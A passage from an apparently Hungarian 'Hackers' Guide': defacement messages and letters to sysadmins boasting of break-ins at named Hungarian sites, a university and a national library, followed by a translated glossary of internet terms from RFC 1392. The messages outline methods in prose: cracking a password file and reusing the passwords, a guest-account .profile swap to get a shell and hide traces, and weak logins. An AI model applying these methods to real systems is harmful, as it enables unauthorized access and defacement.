problema is lehet, mert a logrotate nem tudja ujrainditani a mysql-t es jelen gepen mar 2000-09 ota nem volt logrotate eppen ezert, de ennel ellenere security szempontjabol jo huzas volt ez az adminok reszerol. • talaltunk egy filet /etc/webpasswd melyben vegyesen DES/MD5 jelszavak, melyekbol amiket visszafejtettunk azok mind mukodtek local accountra. (ezt nevezhetjuk a rendszer gyenge pontjanak ? :) Mondjuk a filet addig eleve nem tudtuk olvasni amig nem szereztuk meg az apachtol a www-root euid,egid-et. - Ebben a pillanatban mar minden lehetosegunk megvolt arra, hogy barmelyik honlapot defaceljuk, vagy barmelyik honlaphoz tartozo adatbazist lehuzzunk. 34 Hackers’ Guide - Kivallogattuk a webpasswd filebol a bash shellel rendelkezo usereket, es azokra engedtuk ra a jo oreg JOHN-t! - 15 usert tortunk meg par perc alatt, ezeknek su-val probaltuk es mindnek ez volt a shelles jelszava mint a webpasswd adatbazisban levo jelszaval. (Szinten a rendszer elonyere legyen irva, hogy

ez a 15 user kozul egyetlennek sem volt /bin/bash shellje, foleg false es nehany pine jutott ide.) Ebben a deface-ben a kovetkezo hostok szerepeltek : (minimum :) volt egy kis kavarodas a gepen a webrootok teren :) afilmsite.com agility.hu amstel canderel.hu bignet e-contact.hu e-start.hu foldnapja.hu gandi.hu gfk-dorel-ipms.hu loyolacollege.org pityer.hu planetclub.org portar.hu szinyei.hu autolista.hu geodezia.hu goldfish posterprint.hu trax.hu plakatgyar.hu profitinfo.hu uzlethaz.com poster-display.net regiszterplakathu tundehullareszegen.hu tutynet.com webkom.hu windrivers.hu Na legyetek jok, mi meg csak figyelunk titeket - Haxor Nation Crew - * Nyugatmagyarországi Egyetem feltörése A Rendszergazdának. Figyelmeztetni szeretném, hogy a rendszere nagyon átjárható!!! Bárki nyugodtan bejöhet, és letölthet bármit a szerverrõl, vagy rosszabb esetben le is törölheti annak teljes tartalmát. 35 Hackers’ Guide Ha teheti áldozon egy kis idõt a

biztonságra, vagy esetleg az OP rendszer lecserélésére, mert a SUN rendszerek nagyon sebezhetõek. A rendszer hibái: - A telnet és az ftp elérés bárhonnan elérhetõ, nincs lekorlátozva, így bárki egy accountal bárhonnan bemehet a szerverre, és ott garázdálkodhat. /etc/hostsdeny - A userek létrehozásakor elkövetett egy nagy hibát, ugyanis ha egy user még nem lépett be , akkor az elsõ belépésnél megkérdezi, hogy mi legyen a jelszava, így bárki könnyen accountot szerezhet a szerverre. - SunOS tele van hibákkal, meg suid bit-es programokkal, amik közül nagyon sok sérülékeny, így bárki nyugodtan egy program elindításával root jogokat szerezhet. / lpset exploit / / Ennek kiküszöbölésére nézzen körül www.hackcoza-n és az astalavistaboxsk-n, ott vannak leirasok, hogy hogyan kerülhetjük el az ilyen iranyú programhibákat, pl suid bit levétele/ - Az x-es elérés is bárhonnan elérhetõ, ez nem akkora hiba, de egy csomó exploit csak x

felületen fut. Ilex.efehu hiba: Huhh, ez már azért jobban megvan csinálva, de itt is van mit foltozni, pl az aleph könyvtári szolgaltatáson. Vegyünk egy példát, valaki bárhonnan betelnetel az aleph userrel a könyvtárra, és látja, hogy egy sima account, csak a profile file-ban van megoldva, hogy ne shell-t kapjon, hanem az aleph programot. Namármost, ha valaki egy kicsit is gondolkozik fogja magát, beftp-zik aleph userrel/ nincs letiltva /, és letölti a .profile file-t, majd letorni, utana ha betelnetel egybõl kap egy shellt, onnan már gyerekjáték az egész, ha pedig végzett a dolgával, fogja magát, visszaftp-zi a .profile filet, es nem is latszik hogy valaki betört, mert az aleph egy guest user. Csak szeretném megemlíteni, hogy ez a hiba nem csak itt fordult elõ, hanem az összes magyar opac és aleph telnet-es szolgáltatásnál. Kérem ne vegye azt a deface-et rosszindulatú betörésnek, mert ha egy kicsit elgondolkozik, észre veszi, hogy én nem a

rossz oldalon állok, nyugodtan letörölhettem volna mindent, vagy DOS támadásra is használhattam volna a szerverét, de nem tettem. By Foltos * 36 Hackers’ Guide Országos Széchenyi Könyvtár feltörése A rendszergazdanak. Hat igen, ez a szerver sem a biztonsag csucsa, elegge el van cseszve, marmint az en szemszogembol. De amint az elozo akciombol is kiderult, en nem vagyok gonosz, igy nem is hasznalom csunya dolgokra a szerver kapacitasat, inkabb segiteni szeretnek, nehogy valami rossz fiu kart tegyen a rendszerben. A hibak: /ebbol van eleg/ - A telnet es ftp eleres barhonnan elerheto, igy gyerekjatek a dolog / host.deny / - A finger / a kedvencem / is segit a dolgozonak, hogy megdudjon egyet s mast a szerverrol, pl user nevek, de erre meg visszaterek. - A Sun os egyik legosibb valtozata van a rendszeren, ez vegul is nem nagy hiba, mert erre pont nincs exploit, meg vegulis a root jogokat nem volt konnyu kicsikarni, de azert erdemesebb lenne neha frissiteni az op

rendszeren, vagy lecserelni egy hatekonybbra, pl: Debian Potato .Na , mondjuk ez nem mindig igy van, mert a Sun ujabb verzioi ehhez kepest gyerekjatekok. - A rendszergazda nem tul gyakran foglalkozik a szerverrel, ami nem tul elonyos a rendszer szemplontjabol / Mentsegere legyen irva ennyi bejelentkezes mellett nincs konnyu dolga / - Az ftp root jogokkal fut, ami azert lehet gond, mert egy kis csellel azon keresztul barki olvashatja a shadow filet. / A root jelszot nem lehetett visszafejteni meg superszamitogepeken se, egy jo pont. / Namarmost, egy eszmeletlen hiba, amit nem tudok elkepzeni, hogy miert csinalnak a halando emberek ilyet az, hogy van egy-ket olyan user, aminek usernev=jelszo, es raadasul olyan a belepesi nev, amit minden normalis rendszerbuzerator egybol atnez fingerrel, jelen esetben ez a demo user. Innentol mar gyerekjatek az egesz, es ha valakinek van hozza kedve, nyugodtan lelesheti az egesz halozat forgalmat egy kis programocskaval. Amugy megjegyzem nem en voltam az

elso ezen a szerveren, es az elottem leveo olyan latvanyos nyomokat hagyott, hogy azt nem ezsrevenni.passwd fileban hirtelen feltuno uj nev kongresszusi kepviselo megjegyzessel. Csak ennyit akartam tudatni, es remelem nem lesz belol balhe, mert nem azert csinaltam, hogy megmutassam en vagyok a fasza gyerek, hanem azert, hogy egy ekkora intezmenyben igenis figyeljenek oda a rendszwer biztonsagara. 37 Hackers’ Guide By Foltos * Függelék Internet kisszótár Ez a dokumentum teljes egészében az 1392-es RFC-n alapszik (G. Malkin), mely viszont nagyrészt a 1208-as RFC-re épül. Folyamatosan bővül és időnként javításra kerül. A szótár még nem készült el, vannak még lefordítlatlan részek! A szótárral kapcsolatos észrevételeket, javításokat örömmel várjuk! Tartalom: A address, address mask, address resolution, ARP (Address Resolution Protocol), ARPA, alias, anonymous FTP, archie, archive site, ARPANET, authentication, Autonomous System, B backbone,

BBS (Bulletin Board System), BIND (Berkeley Internet Name Domain), BITNET, BOOTP, bounce, C 38 Hackers’ Guide CCITT, client, Computer Emergency Response Team (CERT), connectionless, cracker, Cyberspace, Cyclic Redundancy Check (CRC), D DARPA, default route, Defense Advanced Research Projects Agency (DARPA), dialup, DNS (Domain Name System), domain, dotted decimal notation, E Electronic Mail (email), email address, Ethernet, Ethernet meltdown, F FAQ, FDDI (Fiber Distributed Data Interface), file transfer, finger, For Your Information (FYI), FQDN, fragment, fragmentation, frame, FTP (File Transfer Protocol), Fully Qualified Domain Name (FQDN), FYI, G gated, gateway, Gopher, H hacker, header, heterogeneous network, hop, host, host address, hostname, 39 Hackers’ Guide I ICMP (Internet Control Message Protocol), internet, Internet, internet address, IP (Internet Protocol), IP address, IP datagram, IPX (Internetwork Packet eXchange), IRC (Internet Relay Chat), ISDN

(Integrated Services Digital Network), J K Kerberos, Kermit, L LAN (Local Area Network), layer, listserv, M mail gateway, mail path, mail server, mailing list, MILNET, MIME (Multipurpose Internet Mail Extensions), MTU (Maximum Transmission Unit), multi-homed host, MX Record (Mail Exchange Record), N name resolution, netiquette, network, NFS(R), NIC (Network Information Center), NIS (Network Information Services), NNTP (Network News Transfer Protocol), node, NSF (National Science Foundation), O P 40 Hackers’ Guide packet, packet switching, ping (Packet internet groper), port, POP (Post Office Protocol), postmaster, PPP, Prospero, protocol, proxy ARP, Q queue, R RARP (Reverse Address Resolution Protocol), repeater, RFC (Request For Comments), RFC 822, RIPE (Reseaux IP Europeenne), rlogin, route, routed, router, RPC (Remote Procedure Call), S SLIP (Serial Line IP), SMTP (Simple Mail Transfer Protocol), SQL (Structured Query Language.), stub network, subnet, subnet address, T TCP

(Transmission Control Protocol), TCP/IP, Telnet, terminal emulator, terminal server, TN3270, topology, Trojan Horse, U UDP (User Datagram Protocol), Usenet, UUCP (UNIX-to-UNIX CoPy), V 41 Hackers’ Guide virus, W WAM (Wide Area Network), World Wide Web (WWW or W3), worm, WYSIWYG, X X (The X Window System), Y Z A address = cím Alapjában véve háromféle cím használatos az Interneten: a levelezési cím (email address), az IP, internet vagy Internet cím és a hardver vagy MAC cím. Lásd még: email address, IP address, internet address. address mask = cím maszk Ez egy bitmaszk amit az IP cím hálózati és alhálózati részének meghatározására használnak. Gyakran egyszerűen csak "subnet mask"-nak nevezik, mert az IP cím hálózati része könnyen kideríthető más módon is. address resolution = címfelderítés Internetes cím hozzárendelése a megfelelő hardvercímhez. ARP (Address Resolution Protocol) = címfelderítési protokol (eljárás). Egy

adott kiszolgáló magas szintű IP címéhez tartozó alacsony szintű hardvercím dinamikus módon történő kiderítésére használják. Az ARP hatóköre csak arra a hálózatra terjed ki, mely támogatja a minden kiszolgáló által hallható "broadcast" csomagokat. Lásd még: proxy ARP ARPA Advanced Research Projects Agency. alias = álnév Ez egy olyan név, mely általában rövid és könnyű megjegyezni, s megfelel egy másik névnek, mely többynire hosszú és nehéz rá emlékezni. anonymous FTP = névtelen FTP A névtelen FTP segítségével felhasználók távoli gépekbe juthatnak be és mindenki számára elérhető documentumokat, file-okat, programokat hozhatnak el anélkül, hogy ott saját elérésük lenne. Mindezt az "anonymous" felhasználói név segítéségvel érhetik el, mely minimális biztonsági ellenőrzések után egy pulikus területre engedi őket. Lásd még: archive site, File Transfer Protocol. archie Egy rendszer, amely

automatikusan begyűjti, indexeli és szolgáltatja az információkat az Interneten. Eredetileg az Internet összes FTP archívumában található file-okról készített indexelt adatbázist, de a későbbi verziók már több más féle információt is szolgáltatnak. Lásd még: archive site, Gopher, Prospero, Wide Area Information Servers. 42 Hackers’ Guide archive site = archív hely (archívum) Egy olyan hely, amely az Internetről gyűjtött file-okat tartalmaz. Az "anonymous FTP hely" például ezekhez az file-okhoz biztosít hozzáférést az FTP protokoll segítségével. Lásd még: anonymous FTP, archie, Gopher, Prospero, Wide Area Information Servers. ARPANET Egy csomagkapcsolt hálózat, melyet a korai 70-es években fejlesztettek, s amely a mai Internet nagyapja volt. Az ARPANET-et 1990 júniusában helyezték üzemen kívül. authentication = azonosítás Egy személy, vagy folyamat kilétének ellenőrzése. [Forrás: MALAMUD] Autonomous System =

Önfenntartó rendszer Olyan útválasztók (routerek) gyűjteménye, melyek közös adminisztráció alá tartoznak és közös belső protokollt használnak a csomagok útvonalának irányítására. B backbone = gerinchálózat Egy hierarchikusan kialakított hálózat legmagasabb szintje. Azok a törzs- és továbbítóhálózatok, melyek ugyanarra a gerinchálózatra kapcsolódnak biztosan összeköttetésben vannak egymással. Lásd még: stub network BBS (Bulletin Board System) Egy számítógép a hozzátartozó szoftverekkel, mely legtöbbször elektronikus üzenetküldésre ad lehetőséget, file archívum található rajta a esetlegesen az üzemeltető tevékenységi körével kapcsolatos más szolgáltatásokkal együtt. Ugyan a legtöbb BBS-t hobbiból működtetik, egyre nagy számban csatlakoznak az Internethez is és sok BBS-t üzemeltetnek kormányok, oktatási intézmények és kutatóközpontok. Lásd még: Electronic Mail, Internet, Usenet. [Forrás: NWNET] BIND

(Berkeley Internet Name Domain) A californiai Berkeley egyetem által kifejlesztett és terjesztett DNS kiszolgáló, mely sok hasonló kereskedelmi szoftver elődje is. BITNET (Because Its Time NETwork) Egy egyetemi számítógépes hálózat, mely interaktív elektronikus levelezést és file-átviteli szolgáltatást nyújt egy "store-and-forward" (tárld és továbbítsd) protokoll segítségével, mely az IBM "Job Entry" prokollján alapul. A Bitnet-II az eredeti Bitnet protokollt IP csomagokba ágyazva az Internetet használja adatátvitelre. BOOTP A 961-es és 1084-es RFC-kben leírt protokoll, melyet a lemez nélküli gépek elindításához használnak. Lásd még: Reverse Address Resolution Protocol bounce = visszadobás A levelek visszaküldése kézbesítési hiba miatt. [Forrás: ZEN] C CCITT (Comite Consultatif International de Telegraphique et Telephonique) Ez a szervezet a United National International Telecommunications Union (ITU - Egyesült

Nemzeti és Nemzetközi Telekommunikációs Egyesülés) és 43 Hackers’ Guide feladata, hogy technikai javaslatokat készítsen telefonos és kommunikációs rendszerekkel kapcsolatban. Minden negyedik évben ülésezik a CCITT, amikor is újabb szabványokat fogadnak el, a legutóbbi ilyen alkalom 1992-ben volt. [Forrás: NNSC] client = kliens Egy számítógépes rendszer vagy folyamat, mely egy másik számítógépes rendszer vagy folyamat szolgáltatásait kéri. Egy munkaállomás, mely egy filekiszolgálótól egy file tartalmát kéri a file-kiszolgáló kliense [Forrás: NNSC] Computer Emergency Response Team (CERT) A CERT-et 1988 novemberében a DARPA hozta létre a "féreg" ügy miatt. A CERT az internetes közösséggel együtt azon dolgozik, hogy a számítógépes biztonsági gondok esetén ellenlépéseket tegyen, felhívja a közösség figyelmét a biztonsági kérdésekre és kutatatásokat végezzen a működő rendszerek biztonságosságának

fejlesztésére. A CERT 24 órás szolgálatot tart, hogy azonnal válaszolhasson a biztonsági problémákra, a támadások elleni védekezésre dokumentumokat, ismertetőket ad ki. A csapat e mellett számos levelezési listát is fenntart, működtet egy anonymous FTP kiszolgálót a cert.org domainen, ahol a biztonsággal kapcsolatos dokumentumok, programkiegészítések és segédprogramok elérhetőek. A CERT levélben elérhető a "cert@cert.org" címen, ill telefonon a +1-412-268-7090 számon (24 órában). Lásd még: Defense Advanced Research Projects Agency, worm connectionless = kapcsolatmentes Adatkommunikációs mód, mely során a kommunikáció előzetes összeköttetés nélkül jön létre. Az adatcsomagok két gép között akár más útvonalon is közlekedhetnek, mert azok egymástól függetlenek. Az UDP egy kapcsolatmentes protokoll. Lásd még: packet switching, User Datagram Protocol. cracker = betörő A betörő olyan egyén, aki engedély nélkül

próbálkozik számítógépes rendszerekbe történő bejutással. Ezek az egyének többnyire rosszindulatóak ellentétben a buherátorokkal (hackers) és a betörésre többféle módszert ismernek. Lásd még: hacker, Computer Emergency Response Team, Trojan Horse, virus, worm. Cyberspace = kibertér Ezt a kifejezést William Gibson, a "Neuromancer" c. fantsztikus novellájában használta előszőr a számítógépes világ és körülötte létező társadalom leírására. [Forrás: ZEN] Cyclic Redundancy Check (CRC) Egy szám, melyet a továbbításra szánt adatokból képeznek. A fogadó oldalon is kiszámítják a CRC-t, összehasonlítják az eredetivel, s így megállapítható, hogy az átvitel során volt-e valamilyen hiba. [Forrás: MALAMUD] D DARPA See: Defense Advanced Research Projects Agency default route = alapértelmezésű útvonal A útvonalválasztó táblában (routing table) egy olyan bejegyzés, mely meghatározza, hogy merre menjenek azok az

adatcsomagok, melyek a 44 Hackers’ Guide táblában nem szereplő hálózatok (vagy gépek) fele irányulnak. [Forrás: MALAMUD] Defense Advanced Research Projects Agency (DARPA) Az Egyesült Államok védelmi minisztériumának ügynöksége, mely új technológiák kifejlesztéséért felelős a hadsereg számára. A DARPA (korábban ARPA) volt felelős a ma ismert Internet fejlesztésének támogatásáért, beleértve a Berkeley Unix és TCP/IP verzióját. [Forrás: NNSC] dialup Egy átmeneti kapcsolat számítógépek között, mely hagyományos telefonvonalon jön létre. DNS (Domain Name System) = (domain név rendszer) A DNS egy általános céllal terjesztett, másolt, adatigénylő rendszer. Elsődleges feladata, hogy az Interneten található gépek nevéből megadja azok IP címét. Manapság az Interneten a neveket "domain név" stítulsban adják meg. Néhány fontosabb domain: COM (commercial, kereskedelmi), .EDU (educational, oktatási), NET (network

operations, a hálózat működtetésével kapcsolatos gépek), .GOV (az USA kormánya), MIL (az U.SA hadserege), US (Egyesült Államok), UK (Egyesült Királyság), AU (Ausztrália), .HU (Magyarország) Gyakran látni "sub-domain" szinten a fenti domain-eket, vagyis pl. az angoloknál a kereskedelmi gépek a COUK domain-en vannak, vagy az egyiptomi kormányzat a .GOVEG domain-en található meg. A domain-ek meghatározása az STD 13-ban, az 1034-es és 1035-ös RFC-ben található meg. Lásd még: Fully Qualified Domain Name domain A "Domain" egy rendkívül sokat használt kifejezés az Interneten. Több féle értelmezésben használatos, úgy is mint adminisztratív domain és úgy is mint domain név. Lásd még : Domain Name System dotted decimal notation = decimális, pontozott jelölés Az IP címek A.BCD pontozott jelölése, ahol az egyes betűk decimális formában a négy byte-os IP címek egy-egy byte-ját jelentik. Lásd még: IP address. [Forrás:

FYI4] E Electronic Mail (email) = elektronikus levél Egy rendszer, melynek segítségével a számítógép felhasználója más felhasználóval (vagy egy csoportnyi felhasználóval) üzenetet válthat egy számítógépes hálózat segítségével. Az elektronikus levelezés az Internet használatának egyik legnépszerűbb módja. [Forrás: NNSC] email address = email cím (elektronikus levél cím) Az a domain-rendszerű vagy UUCP cím, mely meghatározza, hogy az elektronikus levélnek mi a célpontja. Például egy szerkesztő e-mail címe "gmalkin@xylogics.com", amely szerint a címzett a "gmalkin" nevezetű felhasználó az xylogics.com domain-en Lásd még: UNIX-to-UNIX CoPy [Forrás: ZEN] Ethernet Egy 10 Mbit/sec-es átviteli szabvány LAN-ok (helyi hálózatok) számára, melyet eredetileg a Xerox fejlesztett ki, de később a Digital, az Intel és a Xerox (DIX). Minden gép egy koaxkábelen csatlakozik a hálózathoz, ahol az elérés a "Carrier

Sense Multiple Access with Collision Detection (CSMA/CD)" 45 Hackers’ Guide (vivőérzékeny egyidejű elérés ütközésérzékeléssel) technológia segítségével valósul meg. Lásd még: Local Area Network, token ring Ethernet meltdown = Ethernet "szétfolyás" Egy olyan esemény melynek következtében telítettség, vagy telítettség közeli állapot jön létre az etherneten. Ennek legtöbbször illegális vagy félreirányított csomagok az okai és többnyire csak rövid ideig tart. [Forrás: COMER] F FAQ Frequently Asked Question = Gyakori kérdések FDDI (Fiber Distributed Data Interface) = üvegszálas adatátviteli illesztő Egy nagy sebességű (100 Mbit/sec) LAN átviteli szabvány. Local Area Network. [Forrás: RFC1208] file transfer = file átvitel Egy file másolása egyik számítógépről a másikra a hálózaton keresztül. Lásd még: File Transfer Protocol, Kermit. finger Egy program, mely egy adott felhasználóról, vagy egy helyi,

ill. távoli gépbe bejelentkezett felhasználókról különböző adatokat jelenít meg. Többnyire kiírja a teljes nevet, az utolsó bejelentkezés idejét, az üres időt (idle time), a terminál nevét és a terminál helyét (ha lehetséges). Ha a felhasználó úgy akarja, akkor a róla érdeklődők még metudhatják terveit, ill. olvashatnak munkájáról is. For Your Information (FYI) = Hogy tudjon róla ;-)) Az RFC-k egy csoportja, mely nem technikai szabványokat, vagy protokoll leírásokat tartalmaz. Az FYI-ok többnyire általános információkat tartalmaznak a TCP/IP-vel, ill. az Internettel kapcsolatban Lásd még: Request For Comments. FQDN Lásd: Fully Qualified Domain Name fragment = darab Egy csomag egy darabja. Ha az útválasztó (router) egy IP csomagot olyan hálózatra továbbít, ahol a csomagok megengedett mérete kisebb, mint a küldött IP csomagé, akkor azt több kisebb darabra kell felosztani. Ezeket a darabokat a célgép IP meghajtója aztán újra

egymáshoz illeszti. fragmentation = darabolás Az az IP eljárás, melynek során az adatcsomagot kisebb darabokra osztják fel, hogy megfeleljen azon hálózat igényeinek, melyen keresztül kell haladnia. frame = keret Az adatcsomagokat a továbbítórendszer igényeinek megfelelően "fejlécek" és egyéb bevezető információk kisérik. A valódi adatokat beágyazzák ezen kísérőinformációk közé. Lásd még: datagram, packet FTP (File Transfer Protocol) = file átviteli protokoll Egy protokoll, mely lehetőséget ad a felhasználónak, hogy file-okat hozzon el egy távoli géről, vagy küldjön át oda. Az FTP ugyanakkor annak a programnak a neveként is értelmezhető, melyet a felhasználó hív meg, hogy ezt a protokollt igénybe vegye. Az FTP leírása az STD 9-ben és 959-es RFC-ben található meg. Lásd még: anonymous FTP Fully Qualified Domain Name (FQDN) = teljes értékű domain név 46 Hackers’ Guide Az FQDN egy rendszer teljes neve, s nem

csak a gép nevét tartalmazza. Például a "venera" a gép neve, de a "venera.isiedu" már a teljes értékű név Lásd még: hostname, Domain Name System. FYI Lásd: For Your Information G gated Gatedaemon. Egy program, mely egyidejűleg támogat többféle útválasztó (routing) protokollt és protokoll családot. Használni lehet útválasztásra, de hatékony alap az útválasztó protokollok kutatásához. A szoftver díjmentesen letölthető anonymous FTP-vel a "gated.cornelledu" címről Lásd még: routed gateway = átjáró Manapság az "útválasztó" (router) kifejezést szokás használni az eredeti "átjáró" (gateway) helyett. Az átjáró az egy olyan eszköz/program, mely két hálózat között cseréli ki az adatokat. Más értelmezésben viszont a gateway lehet átjáró a protokollok között is, de ez alkalmazás szintű és nem keverendő össze a hálózatos jelentésével. Protokollok közötti átjáró pl

egy olyan segédprogram, mely az elektronikus leveleket a hírcsoportoknak továbbítja, ill. vissza. Lásd még: mail gateway, router Gopher Terjesztett információs rendszer, mely információk hierachikus gyűjteményének elérését teszi lehetővé az Interneten. A Gopher egy egyszerű protokollt használ, mely egyetlen Gopher kliens számára lehetővé teszi, hogy bármely Gopher szerveren információkat érhessen el, s mindezt egyetlen Gopher felületen teszi. Lásd még: archie, archive site, Prospero, Wide Area Information Servers. H hacker = buherátor Egy személy, ki örömét leli a különböző rendszerek, különösen a számítógépek és a számítógépes hálózatok belső működésének mélyreható megismerésében. Ezt a kifejezést (hacker) gyakran rossz indulattal használják, pedig a betörő, feltörő (cracker) lenne a megfelelő. Lásd még: cracker. header = fejrész A csomag azon része, mely megelőzi magát az adatot, s tartalmazza a forrás és

a cél címét, a hibakereső kódokat és más mezőket. A fejrész az elektronikus levélüzenet része is, mely a levél belsejét (body) előzi meg és sok más dolog mellett az üzenet feladóját, feladási idejét tartalmazza. Lásd még: Electronic Mail, packet. heterogeneous network = heterogén hálózat Olyan hálózat, mely többféle hálózat protokollt futtat. Lásd még: IP, IPX hop = ugrás Az útválasztásnál használt kifejezés. Egy hálózaton a forrástól a célhoz vezető út az útválasztókon át egy sorozat ugrásból áll. host = hoszt (gép, gazdagép) 47 Hackers’ Guide Egz számítógép, mely lehetővé teszi felhasználói számára, hogy valamely hálózaton egy másik hoszttal kommunikálhassanak. Az egyes felhasználók ezt különböző alkalmazások segítségével tehetik meg. Ezen alkalmazások között szerepel az elektronikus levelező, a Telnet és az FTP. [Forrás: NNSC] host address = hoszt cím Lásd: internet address hostname A

név, melyet a gépnek adnak. Lásd még: Fully Qualified Domain I ICMP (Internet Control Message Protocol) = Internet ellenorzo üzenet protokoll Az ICMP egy kiegészítés az Internet Protokollhoz. Lehetové teszi hibaüzenetek, teszt csomagok és az IP-vel kapcsolatos információs üzenetek generálását. Leírása megtalálható az STD 5-ben és a 792-es RFC-ben [Forrás: FYI4] internet Amíg az Internet egy hálózat, magát a kifejezést, hogy "internet" legtöbbször egy csoport számítógépes hálózat esetében használják, melyeket útválasztók segítségével egymáshoz kapcsoltak. Lásd még: network Internet (itt fontos a nagy "I" betű) Az Internet a legnagyobb internet a világon. Három szintű felépítése van, mely a gerinchálózatokból (pl. NSFNET, MILNET), közép-szintű hálózatokból és törzshálózatokból áll. Az Internet egy multiprotokollos internet. Lásd még: backbone, mid-level network, stub network, transit network,

Internet Protocol, Corporation for Research and Educational Networks, National Science Foundation. internet address = internet cím Egy IP cím, mely az internet egyik gépének sajátja. Az Internet cím (nagy "I"vel) egy az Interneten található gép sajátja Lásd még: internet, Internet, IP address. IP (Internet Protocol) = Internet Protokoll Az Internet Protokoll, ahogy annak leírása megtalálható az STD 5-ben és a 791-es RFC-ben, a TCP/IP protokoll alapja. Ez egy kapcsolatmentes, legjobb eredményre törekvo, csomagkapcsolt protokoll. Lásd még: packet switching, Request For Comments, TCP/IP Protocol Suite. IP address = IP cím A 32 bites cím, ahogyan azt az STD 5 és a 791-es RFC leírja. Többnyire decimális, pontozott jelölés formájában találkozhatunk vele. Lásd még: dot address, internet address, Internet Protocol, subnet address, host address. IP datagram Egy önálló adatcsomag, mely elegendo információt hordoz ahhoz, hogy a forrásgéptol a

célba írányítódjék, anélkül, hogy korábban a forrásgépnek, a célgépnek, vagy a továbbító hálózatnak egymással fel kellett volna venniük a kapcsolatot. IPX (Internetwork Packet eXchange) A Novell protokollja, melyet a Netware használ. Egy útválasztó, mely IPX útválasztással rendelkezik (routing) összetud kapcsolni helyi hálózatokat, ezért a Novell Netware kliensek és kiszolgálók egymással kommunikálni tudnak. Lásd még: Local Area Network 48 Hackers’ Guide IRC (Internet Relay Chat) Egy világméretű "parti-vonal" protokoll, mely valósidejű beszélgetést tesz lehetové másokkal. Az IRC szerverként épül fel, mely felhasználónként egy kliensprogramtól fogad el kapcsolatot. [Forrás: HACKER] ISDN (Integrated Services Digital Network) = Integrált Szolgáltatású Digitális Hálózat Egy mostanság eloretöro technológia, melyet a telefontársaságok kezdtek kínálni. Az ISDN magában foglalja a hang és digitális

hálózati szolgáltatásokat egyedtlen médián belül, ezzel lehetoséget adva az digitális adatszolgáltatások és a hang szolgáltatások használatát egy egyetlen vezeték segítségével. Az ISDN szabványait a CCITT határozza meg. Lásd még: CCITT [Forrás: RFC1208] J K Kerberos A Kerberos a MIT Athena projektjének biztonsági rendszere. Szimmetrikus kulcstitkosításon alapszik. Kermit A Columbia egyetem által kifejlesztett népszerű file átviteli protokoll. Mivel a Kermit szinte minden operációs környezetben fut, ezért a file-átvitelnek egy egyszerű módját biztosítja. A Kermit azonban nem egyezik meg az FTP-vel! L LAN (Local Area Network)> = helyi hálózat Egy adatátviteli hálózat, melynek feladata mindössze egy néhány négyzetkilométernyi, vagy ennél kisebb terület kiszolgálása. Mivel a hálózat csak kis területet ér el, ezért a hálózati protokollok optimalizálásával akár 100 Mbit/sec. sebesség is elérheto Lásd még: Ethernet,

Fiber Distributed Data Interface, token ring, Wide Area Network. [Forrás: NNSC] layer = réteg A számítógépek kommunikációs hálózatát többé-kevésbé független protokollok csoportosításával lehet létrehozni, mely protokollok mindegyike külön rétegben (szinten) található. A legalacsonyabb réteg irányítja a hosztok közötti információt a hardverek szintjén, míg a legmagasabb a felhasználói alkalmazásokkal áll kapcsolatban. Minden réteg az alattalévőre épül Minden rétegnél a programok a rétegnek megfelelő protokollt használják a hosztok közötti kommunikációra. A TCP/IP öt rétegből, az OSI hétből áll A különböző rétegek használatának előnye, hogy az információk rétegek közti átadásának módját egyértelműen meghatározták, így egy rétegnek a megváltozása nincs hatással a többi rétegre. Ez nagymértékben leegyszerűsíti a communikációs programok írását és karbantartását. Lásd még: TCP/IP Protocol

Suite listserv = listaszerver Automatikus levelezési lista terjesztő rendszer, melyet eredetileg a Bitnet/EARN hálózat számára terveztek. Lásd még: Bitnet, mailing list 49 Hackers’ Guide M mail gateway = levélezési átjáró Egy gép, mely két vagy több levelezőrendszert kapcsol össze (beleértve a különféle levelezőrendszereket is) és kicseréli az üzeneteket közöttük. Az üzenetek feltérképezése és átalakítása gyakran elég bonyolult lehet és többnyire a "tárolás és továbbítás" módszerét kell alkalmazni, ahol a teljes üzenetet fogadni kell, mielőtt az továbbítódik a következő rendszerre a megfelelő átalakítás után. mail path = levelezési útvonal Gépnevek sorozata, mely meghatározza, hogy a elektronikus levélnek milyen úton kell haladnia az egyik felhasználótól a másikig. Ezt a címzési rendszert elsősorban az UUCP hálózatoknál használják. Lásd még: email address, UNIX-to-UNIX CoPy. mail server =

levelező szerver Egy szoftver, mely file-okat, vagy információkat ad ki levélben küldött kérések alapján. A levelező szervereket a Bitnet-ben is használják az FTP-szerű szolgálatok ellátására. (Megjegyzés: a levélváltokat (mail exchanger) tévesen nevezik levelező szervernek). Bitnet, Electronic Mail, FTP [Forrás: NWNET] mailing list = levelezési lista Egy levelezési címekből álló lista, melyet a levélterjesztő használ, hogy egy csoportnyi emberhez eljuttassa az üzeneteket. A levelezési listákat többnyire bizonyos témák megvitatására használják, épp ezért a különféle levelezési listák különböző témákkal kapcsolatosak. A levelezési lista moderálva is lehet Ez azt jelenti, hogy a levél előszőr a moderátornak megy, aki eldöntni, hogy kimehet-e az üzenet a lista tagjainak. A listára való fel- és leiratkozásra vonatkozó kéréseket mindig egy külön címre kell küldeni (pl. list-request, vagy majordomo). Lásd még:

Electronic Mail MILNET MILitary NETwork. Eredetileg az ARPANET része volt, de 1984-ben különválasztották, hogy a katonai létesítmények megbízható hálózati szolgáltatásokkal rendelkezzenek. Az ARPANET-et eközben kutatási célokra használták tovább. MIME (Multipurpose Internet Mail Extensions) = (Többcélú Internet Levélkiegészítések) Kiegészítés az Internet elektronikus levelezéshez, mely megengedi a nem szöveges adatátvitelt, úgy mint grafika, hang és fax. Leírása az 1341-es RFCben található meg Lásd még: Electronic Mail MTU (Maximum Transmission Unit) = (Maximális adatáviteli egység) A legnagyobb keretméret, melyet a fizikai közegben el lehet küldeni. multi-homed host = többotthonos hoszt Olyan hoszt, melynek egynél több hálózathoz van csatlakozása. Ez a hoszt bármely kapcsolat felől fogdhat adatot, vagy küldhet oda, de más csomópontok számára nem végez útválasztást. Lásd még: host, router [Forrás: MALAMUD] MX Record

